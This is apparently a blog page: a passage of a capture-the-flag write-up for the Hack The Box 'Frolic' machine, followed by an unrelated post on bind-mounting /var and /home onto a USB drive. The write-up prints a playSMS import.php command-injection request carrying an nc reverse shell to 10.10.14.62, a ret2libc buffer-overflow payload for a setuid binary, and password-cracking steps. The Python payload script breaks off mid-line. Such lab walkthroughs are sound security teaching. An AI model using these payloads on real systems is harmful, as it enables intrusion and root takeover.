The file is then downloaded and stored in a zip file with the command curl http://frolic.htb:9999/asdiSIAJJ0QWE9JAS/ | base64 -d > evidence/data/asdiSIAJJ0QWE9JAS.zip. The archive is password protected, though it appears to contain a single index.php file. Attempting to crack the password by using John with the following steps

Create a usable hash for cracking with John by using the command zip2john evidence/data/asdiSIAJJ0QWE9JAS.zip | tee evidence/data/asdiSIAJJ0QWE9JAS.zip.hash
Start the John container with the command podman run -v ./evidence/data:/opt/cracking -it --rm --entrypoint bash docker.io/obscuritylabs/johntheripper
Crack the hash by using the command ./john --format=PKZIP --wordlist /opt/cracking/rockyou.txt /opt/cracking/asdiSIAJJ0QWE9JAS.zip.hash

root@fb3af4a2ae0c:/opt/john/run# ./john --format=PKZIP --wordlist /opt/cracking/rockyou.txt /opt/cracking/asdiSIAJJ0QWE9JAS.zip.hash 
Warning: invalid UTF-8 seen reading /opt/cracking/rockyou.txt
Using default input encoding: UTF-8
Loaded 1 password hash (PKZIP [32/64])
Will run 2 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
password         (asdiSIAJJ0QWE9JAS.zip/index.php)
1g 0:00:00:00 DONE (2021-06-05 16:19) 100.0g/s 354600p/s 354600c/s 354600C/s 123456..sss
Use the "--show" option to display all of the cracked passwords reliably
Session completed

The password password is used to extract the file from the zip archive

❯ 7z x asdiSIAJJ0QWE9JAS.zip

7-Zip [64] 17.04 : Copyright (c) 1999-2021 Igor Pavlov : 2017-08-28
p7zip Version 17.04 (locale=en_US.UTF-8,Utf16=on,HugeFiles=on,64 bits,2 CPUs x64)

Scanning the drive for archives:
1 file, 360 bytes (1 KiB)

Extracting archive: asdiSIAJJ0QWE9JAS.zip
--
Path = asdiSIAJJ0QWE9JAS.zip
Type = zip
Physical Size = 360

    
Enter password (will not be echoed):
Everything is Ok

Size:       617
Compressed: 360

The contents of the index.php file is a hex string

4b7973724b7973674b7973724b7973675779302b4b7973674b7973724b7973674b79737250463067506973724b7973674b7934744c5330674c5330754b7973674b7973724b7973674c6a77720d0a4b7973675779302b4b7973674b7a78645069734b4b797375504373674b7974624c5434674c53307450463067506930744c5330674c5330754c5330674c5330744c5330674c6a77724b7973670d0a4b317374506973674b79737250463067506973724b793467504373724b3173674c5434744c53304b5046302b4c5330674c6a77724b7973675779302b4b7973674b7a7864506973674c6930740d0a4c533467504373724b3173674c5434744c5330675046302b4c5330674c5330744c533467504373724b7973675779302b4b7973674b7973385854344b4b7973754c6a776743673d3d0d0a

Decoding the hex string is done with the command xxd -r -p index.php and reveals a Base64 encoded string

KysrKysgKysrKysgWy0+KysgKysrKysgKysrPF0gPisrKysgKy4tLS0gLS0uKysgKysrKysgLjwr
KysgWy0+KysgKzxdPisKKysuPCsgKytbLT4gLS0tPF0gPi0tLS0gLS0uLS0gLS0tLS0gLjwrKysg
K1stPisgKysrPF0gPisrKy4gPCsrK1sgLT4tLS0KPF0+LS0gLjwrKysgWy0+KysgKzxdPisgLi0t
LS4gPCsrK1sgLT4tLS0gPF0+LS0gLS0tLS4gPCsrKysgWy0+KysgKys8XT4KKysuLjwgCg==

By using the command cat index.php | xxd -r -p | tr -d '\r\n' | base64 -d the decoded data is obtained

+++++ +++++ [->++ +++++ +++<] >++++ +.--- --.++ +++++ .<+++ [->++ +<]>+
++.<+ ++[-> ---<] >---- --.-- ----- .<+++ +[->+ +++<] >+++. <+++[ ->---
<]>-- .<+++ [->++ +<]>+ .---. <+++[ ->--- <]>-- ----. <++++ [->++ ++<]>
++..<

By decoding the brainfuck code, the string idkwhatispass is obtained.

Further scanning is done with the ffuf command that scans recursively to locate any other directories/pages that weren't found on the first scan

ffuf -w /usr/share/seclists/Discovery/Web-Content/raft-medium-directories.txt -recursion -recursion-depth 1 -u http://frolic.htb:9999/FUZZ -c -ic -v -replay-proxy http://127.0.0.1:8080 -o scans/ffuf.recursive.9999.json

One relevant result is found in the URL http://frolic.htb:9999/dev/backup/ where the page only has the string /playsms and accessing the URL http://frolic.htb:9999/playsms shows the playSMS page.

playSMS Service

By using the credentials that were found, access was gained to the playSMS service with an admin account.

Unable to successfully determine the version of playSMS that is being used, it is assumed that one of the file upload vulnerabilities for version 1.4 may work

---------------------------------------------------------------------------------------- ---------------------------------
 Exploit Title                                                                          |  Path
---------------------------------------------------------------------------------------- ---------------------------------
PlaySMS - 'import.php' (Authenticated) CSV File Upload Code Execution (Metasploit)      | php/remote/44598.rb
PlaySMS - index.php Unauthenticated Template Injection Code Execution (Metasploit)      | php/remote/48335.rb
PlaySms 0.7 - SQL Injection                                                             | linux/remote/404.pl
PlaySms 0.8 - 'index.php' Cross-Site Scripting                                          | php/webapps/26871.txt
PlaySms 0.9.3 - Multiple Local/Remote File Inclusions                                   | php/webapps/7687.txt
PlaySms 0.9.5.2 - Remote File Inclusion                                                 | php/webapps/17792.txt
PlaySms 0.9.9.2 - Cross-Site Request Forgery                                            | php/webapps/30177.txt
PlaySMS 1.4 - '/sendfromfile.php' Remote Code Execution / Unrestricted File Upload      | php/webapps/42003.txt
PlaySMS 1.4 - 'import.php' Remote Code Execution                                        | php/webapps/42044.txt
PlaySMS 1.4 - 'sendfromfile.php?Filename' (Authenticated) 'Code Execution (Metasploit)  | php/remote/44599.rb
PlaySMS 1.4 - Remote Code Execution                                                     | php/webapps/42038.txt
PlaySMS 1.4.3 - Template Injection / Remote Code Execution                              | php/webapps/48199.txt
---------------------------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results
Papers: No Results

Attempting to use the exploit 42003, which points to a CSV file upload that is unverified and allows for RCE. However, this was unsuccessful, it appears that the application does check for a valid filename and doesn't execute any PHP code on the filename.

Attempting to use the exploit 42044, this also uses a CSV file that is uploaded to the Phonebook, which is accessible via My Account -> Phonebook. The exploit relies on the header value of the User-Agent in the request being changed and then it is executed by the page, there is no file written to disk. The contents of the CSV file is shown below

Name,Mobile,Email,Group code,Tags
,2,,,

The request header in the upload process is then changed to

POST http://frolic.htb:9999/playsms/index.php?app=main&inc=feature_phonebook&route=import&op=import HTTP/1.1
Host: frolic.htb:9999
User-Agent: id; hostname
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Content-Type: multipart/form-data; boundary=---------------------------72950579317560938561223174980
Content-Length: 457
Origin: http://frolic.htb:9999
DNT: 1
Connection: keep-alive
Referer: http://frolic.htb:9999/playsms/index.php?app=main&inc=feature_phonebook&route=import&op=list
Cookie: PHPSESSID=6rl9keisf6lf85dib15uvtgve1
Upgrade-Insecure-Requests: 1

The result is the page that confirms the upload shows the output of the command.

In order to establish a reverse shell, the following request is sent in this process

POST http://frolic.htb:9999/playsms/index.php?app=main&inc=feature_phonebook&route=import&op=import HTTP/1.1
Host: frolic.htb:9999
User-Agent: rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.62 4444 >/tmp/f
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Content-Type: multipart/form-data; boundary=---------------------------93784517437469769342519032468
Content-Length: 457
Origin: http://frolic.htb:9999
DNT: 1
Connection: keep-alive
Referer: http://frolic.htb:9999/playsms/index.php?app=main&inc=feature_phonebook&route=import&op=list
Cookie: PHPSESSID=6rl9keisf6lf85dib15uvtgve1
Upgrade-Insecure-Requests: 1

-----------------------------93784517437469769342519032468
Content-Disposition: form-data; name="X-CSRF-Token"

56cecb3aafb890acde113ea8ba5ef2ab
-----------------------------93784517437469769342519032468
Content-Disposition: form-data; name="fnpb"; filename="test.csv"
Content-Type: text/csv

Name,Mobile,Email,Group code,Tags
,2,,,

-----------------------------93784517437469769342519032468--

This manages to successfully establish the reverse shell as the www-data user

❯ nc -lvnp 4444
Listening on 0.0.0.0 4444
Connection received on 10.129.163.216 52410
/bin/sh: 0: can't access tty; job control turned off
$ id; hostname; pwd
uid=33(www-data) gid=33(www-data) groups=33(www-data)
frolic
/var/www/html/playsms
$

The config.php file contains the credentials for the MySQL database



Shell Access

www-data

The reverse shell is obtained with the user www-data and the user flag is readable by this service account

$ ls -la /home/ayush
total 36
drwxr-xr-x 3 ayush ayush 4096 Sep 25  2018 .
drwxr-xr-x 4 root  root  4096 Sep 23  2018 ..
-rw------- 1 ayush ayush 2781 Sep 25  2018 .bash_history
-rw-r--r-- 1 ayush ayush  220 Sep 23  2018 .bash_logout
-rw-r--r-- 1 ayush ayush 3771 Sep 23  2018 .bashrc
drwxrwxr-x 2 ayush ayush 4096 Sep 25  2018 .binary
-rw-r--r-- 1 ayush ayush  655 Sep 23  2018 .profile
-rw------- 1 ayush ayush  965 Sep 25  2018 .viminfo
-rwxr-xr-x 1 ayush ayush   33 Sep 25  2018 user.txt
$ cat /home/ayush/user.txt
2ab95909cf509f85a6f476b59a0c2fe0


One directory that appears to be out of the default or ordinary directory structure for the user's home is .binary

$ ls -Al /home/ayush/.binary
total 8
-rwsr-xr-x 1 root root 7480 Sep 25  2018 rop
$ file /home/ayush/.binary/rop
/home/ayush/.binary/rop: setuid ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), dynamically linked, interpreter /lib/ld-linux.so.2, for GNU/Linux 2.6.32, BuildID[sha1]=59da91c100d138c662b77627b65efbbc9f797394, not stripped


Privilege Escalation

The binary rop (MD5 001d6cf82093a0d716587169e019de7d) is downloaded from the remote system for further analysis.

When executing the program, it shows the following message

$ /home/ayush/.binary/rop
[*] Usage: program 


When adding any string, as mentioned in the usage message, it simply prints it to the screen.

The Radare2 container has the 32-bit libraries necessary to run the binary, this can be done by executing the following command

podman run -v ./:/mnt -it --rm --cap-drop=ALL --cap-add=SYS_PTRACE --entrypoint bash docker.io/radare/radare2


Loading the binary in Radare2 for assembly analysis, it shows that there are two relevant functions within the binary, the main and sym.vuln.
The main function checks if the parameter count is greater than 1 and then calls the sym.vuln function, otherwise it prints the usage message and exits the application.

     0x080484b6      83c410         add esp, 0x10
     0x080484b9      833b01         cmp dword [ebx], 1           ; Check if parameter count is equal to 1
.--< 0x080484bc      7f17           jg 0x80484d5                 ; jump if parameter count is greater than 1
|    0x080484be      83ec0c         sub esp, 0xc
|    0x080484c1      68c0850408     push str.___Usage:_program__message_ ; 0x80485c0 ; "[*] Usage: program " ; const char *s
|    0x080484c6      e895feffff     call sym.imp.puts           ; int puts(const char *s)
|    0x080484cb      83c410         add esp, 0x10
|    0x080484ce      b8ffffffff     mov eax, 0xffffffff         ; -1
|    0x080484d3      eb19           jmp 0x80484ee               ; jumps to exit
|    ; CODE XREF from main @ 0x80484bc
'--> 0x080484d5      8b4304         mov eax, dword [ebx + 4]
     0x080484d8      83c004         add eax, 4
     0x080484db      8b00           mov eax, dword [eax]
     0x080484dd      83ec0c         sub esp, 0xc
     0x080484e0      50             push eax                    ; int32_t arg_8h
     0x080484e1      e812000000     call sym.vuln               ; Call to function that prints the entered value to the screen


The sym.vuln function uses the function strcpy without any validation of data being passed in the arguments and this is where the BoF takes place

┌ 58: sym.vuln (char *src);
│           ; var char *format @ ebp-0x30
│           ; arg char *src @ ebp+0x8
│           0x080484f8      55             push ebp
│           0x080484f9      89e5           mov ebp, esp
│           0x080484fb      83ec38         sub esp, 0x38
│           0x080484fe      83ec08         sub esp, 8
│           0x08048501      ff7508         push dword [src]            ; const char *src
│           0x08048504      8d45d0         lea eax, [format]
│           0x08048507      50             push eax                    ; char *dest
│           0x08048508      e843feffff     call sym.imp.strcpy         ; char *strcpy(char *dest, const char *src)
│           0x0804850d      83c410         add esp, 0x10
│           0x08048510      83ec0c         sub esp, 0xc
│           0x08048513      68dd850408     push str.___Message_sent:_  ; 0x80485dd ; "[+] Message sent: " ; const char *format
│           0x08048518      e823feffff     call sym.imp.printf         ; int printf(const char *format)
│           0x0804851d      83c410         add esp, 0x10
│           0x08048520      83ec0c         sub esp, 0xc
│           0x08048523      8d45d0         lea eax, [format]
│           0x08048526      50             push eax                    ; const char *format
│           0x08048527      e814feffff     call sym.imp.printf         ; int printf(const char *format)
│           0x0804852c      83c410         add esp, 0x10
│           0x0804852f      90             nop
│           0x08048530      c9             leave
└           0x08048531      c3             ret


The instruction at the address 0x080484fb shows that there is memory being allocated, this by subtracting 0x38 from the value of the esp register, this shows that there are 56 bytes being allocated.
By creating a De Bruijn string with the command ragg2 -rP 56, it is possible to obtain the specific amount of bytes needed for the buffer overflow, the string that is generated is AAABAACAADAAEAAFAAGAAHAAIAAJAAKAALAAMAANAAOAAPAAQAARAASA and below is how the binary is executed within Radare2

[0xf7f79549]> doo AAABAACAADAAEAAFAAGAAHAAIAAJAAKAALAAMAANAAOAAPAAQAARAASA
Process with PID 7 started...                        
= attach 7 7                        
File dbg:///mnt/rop  AAABAACAADAAEAAFAAGAAHAAIAAJAAKAALAAMAANAAOAAPAAQAARAASA reopened in read-write mode
7                     
[0xf7f0a0b0]> dc                             
[+] SIGNAL 11 errno=0 addr=0x41534141 code=1 si_pid=1095975233 ret=0 


Now check the registers with the command dr=

[0x41534141]> dr=
    eax 0x00000038      ebx 0xffba42b0      ecx 0x00000000      edx 0xf7ef9890
    esi 0xf7ef8000      edi 0xf7ef8000      esp 0xffba4280      ebp 0x52414151
    eip 0x41534141   eflags 0x00010282     oeax 0xffffffff  


The eip register is the one that is relevant in this case, this value is what specifies the amount of padding needed to generate the BoF and where to start with the payload, the output below shows the amount of bytes that are needed

[0x41534141]> wopO `dr eip`
52


This can be confirmed by generating a new string that has 52 A and 4 B characters, this can be done by running the command python -c "print('A'*52 + 'BBBB')", when using this string on the application the eip register should have the value 0x42424242

[0x41534141]> doo AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABBBB
Process with PID 8 started...
= attach 8 8
File dbg:///mnt/rop  AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABBBB reopened in read-write mode
8
[0xf7ef70b0]> dc
[+] SIGNAL 11 errno=0 addr=0x42424242 code=1 si_pid=1111638594 ret=0
[0x42424242]> drr
role reg    value    refstr
―――――――――――――――――――――――――――
A0   eax    38       56 .shstrtab eax ascii ('8')
A1   ebx    ffee7680 [stack] ebx stack R W 0x2
A2   ecx    0        0
A3   edx    f7ee6890 edx
     esi    f7ee5000 esi,edi
     edi    f7ee5000 esi,edi
SP   esp    ffee7650 [stack] esp stack R W 0xffee7800
BP   ebp    41414141 ebp ascii ('A')
PC   eip    42424242 eip ascii ('B')
     xfs    0        0
     xgs    63       99 .shstrtab ascii ('c')
     xcs    23       35 .comment ascii ('#')
     xss    2b       43 .comment ascii ('+')
     eflags 10282    eflags
SN   oeax   ffffffff -1 oeax


Checking the binary details with the i command, it shows that the nx is enabled, for this reason it is necessary to create a ROP chain to spawn a shell that gives access to the root account.
Due to this flag that is enabled, it is necessary to search for a couple of objects in the libc.so.6 library that is running on the target host, the following steps are followed
Obtain the memory address of the libc.so.6 library with the command ldd rop, for this instance the address is 0xb7e19000 and the path of the library is /lib/i386-linux-gnu/libc.so.6
Obtain the offset address of the system function with the command readelf -s /lib/i386-linux-gnu/libc.so.6 | grep "system", for this instance the offset is 0x0003ada0
Obtain the offset address of the exit function with the command readelf -s /lib/i386-linux-gnu/libc.so.6 | grep "exit", for this instance the offset is 0x0002e9d0
Obtain the offset address of the /bin/sh string with the command strings -tx /lib/i386-linux-gnu/libc.so.6 | grep "/bin/sh", for this instance the offset is 0x15ba0b

Below is the output of all the commands mentioned in the steps above

$ ldd rop
        linux-gate.so.1 =>  (0xb7fda000)
        libc.so.6 => /lib/i386-linux-gnu/libc.so.6 (0xb7e19000)
        /lib/ld-linux.so.2 (0xb7fdb000)
$ readelf -s /lib/i386-linux-gnu/libc.so.6 | grep "system"
   245: 00112f20    68 FUNC    GLOBAL DEFAULT   13 svcerr_systemerr@@GLIBC_2.0
   627: 0003ada0    55 FUNC    GLOBAL DEFAULT   13 __libc_system@@GLIBC_PRIVATE
  1457: 0003ada0    55 FUNC    WEAK   DEFAULT   13 system@@GLIBC_2.0
$ readelf -s /lib/i386-linux-gnu/libc.so.6 | grep "exit"
   112: 0002edc0    39 FUNC    GLOBAL DEFAULT   13 __cxa_at_quick_exit@@GLIBC_2.10
   141: 0002e9d0    31 FUNC    GLOBAL DEFAULT   13 exit@@GLIBC_2.0
   450: 0002edf0   197 FUNC    GLOBAL DEFAULT   13 __cxa_thread_atexit_impl@@GLIBC_2.18
   558: 000b07c8    24 FUNC    GLOBAL DEFAULT   13 _exit@@GLIBC_2.0
   616: 00115fa0    56 FUNC    GLOBAL DEFAULT   13 svc_exit@@GLIBC_2.0
   652: 0002eda0    31 FUNC    GLOBAL DEFAULT   13 quick_exit@@GLIBC_2.10
   876: 0002ebf0    85 FUNC    GLOBAL DEFAULT   13 __cxa_atexit@@GLIBC_2.1.3
  1046: 0011fb80    52 FUNC    GLOBAL DEFAULT   13 atexit@GLIBC_2.0
  1394: 001b2204     4 OBJECT  GLOBAL DEFAULT   33 argp_err_exit_status@@GLIBC_2.1
  1506: 000f3870    58 FUNC    GLOBAL DEFAULT   13 pthread_exit@@GLIBC_2.0
  2108: 001b2154     4 OBJECT  GLOBAL DEFAULT   33 obstack_exit_failure@@GLIBC_2.0
  2263: 0002e9f0    78 FUNC    WEAK   DEFAULT   13 on_exit@@GLIBC_2.0
  2406: 000f4c80     2 FUNC    GLOBAL DEFAULT   13 __cyg_profile_func_exit@@GLIBC_2.2
$ strings -tx /lib/i386-linux-gnu/libc.so.6 | grep "/bin/sh"
 15ba0b /bin/sh


All of the offsets need to be added to the address for the libc.so.6 library in order to obtain the necessary values

[0x42424242]> ?v 0xb7e19000 + 0x0003ada0
0xb7e53da0
[0x42424242]> ?v 0xb7e19000 + 0x0002e9d0
0xb7e479d0
[0x42424242]> ?v 0xb7e19000 + 0x15ba0b
0xb7f74a0b


These values can now be used in a python script to generate the payload that can be used to exploit the binary and achieve privilege escalation

from struct import pack
from base64 import b64encode

padding = b'A' * 52
system_address = pack('


The output string is encoded in Base64, which makes it easier to copy it over to the target host to exploit the binary

$ ./rop $(echo QUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQaA95bfQeeS3C0r3tw== | base64 -d)


The command above manages to successfully exploit the BoF vulnerability in the binary and privilege escalation is achieved via this method.



Bind Linux Directories
Wed, 29 Sep 2021 16:34:14 +0000
I wanted to move the /var and /home directories from the MicroSD to a USB flash drive, this because those are the two directories that see much more movement and that could benefit from being moved away from the MicroSD.



It’s really easy to have the directories in a different partition but I didn’t want to partition a single USB thumb drive or have two thumb drives for each directory so I looked into having the directories in one partition, this can be achieved with binding.

First, create the partition on the desired thumb drive

sudo mkfs.ext4 -O ^has_journal /dev/sdxn


This creates the ext4 partition in the thumb drive without journaling which lowers the amount of reads and writes that is done to the drive.

Once you have the partition created and mounted, create the directories you want to move to the drive, in my case I created home and var so I ran the following commands

sudo mkdir /mnt/usb/var

sudo mkdir /mnt/usb/home


Because I’m creating this on a system that hasn’t been fully setup yet, I don’t have anything on home thus no need to copy over anything from there, but var does have some files that need to be copied over, so I ran this command

sudo cp -ax /var/\* /mnt/usb/var


After the copying process is completed you can check the directory to see everything that was copied over. As an extra step I created an empty file in each directory and named it notusb this with the sole purpose of knowing when the directory isn’t mounted.

You could either leave the directories as they are or completely remove them, which is something that would be advised in case you want to have that space available. I decided to leave them.

Once you’ve copied everything over you can edit fstab to have everything mount during boot time, so use your favorite file editor and add the following line

/mnt/usb/var /var none bind


I also added another line for the home but you get the idea. It will be necessary to first mount the drive before trying to mount as it wouldn’t make sense otherwise, so be sure to add the drive to the fstab as well.

You want to obtain the UUID of the partition as it makes it easier to mount that specific partition and not have another device get mounted because of some issue. To do this run the following command

sudo blkid | grep /dev/sdxn


Where sdxn is the same one used on the command above to create a partition. This should return one line with the UUID of the partition, if it doesn’t then just run the _blkid _command and look at all of the output given.

You should see a line like

/dev/sda1: UUID=”f6e6oe58–467c-ae79-9cf4–000199562b81" TYPE=”ext4" PARTUUID=”fe096750–02"


You would grab the UUID value without the quotes and place it in the fstab in the line where you establish the mount point for the drive

UUID=f6e6oe58–467c-ae79–9cf4–000199562b81 /mnt/usb ext4 defaults,noatime 0 0


At this point you should be set and would be just a matter of mounting everything manually, but if you can reboot then I would recommend going that route as you will verify that the mounting will be carried out accordingly during boot up of the device.

I check if the file notusb exists in either directory and if it doesn’t then it means that everything worked accordingly and I can continue working on setting up the system.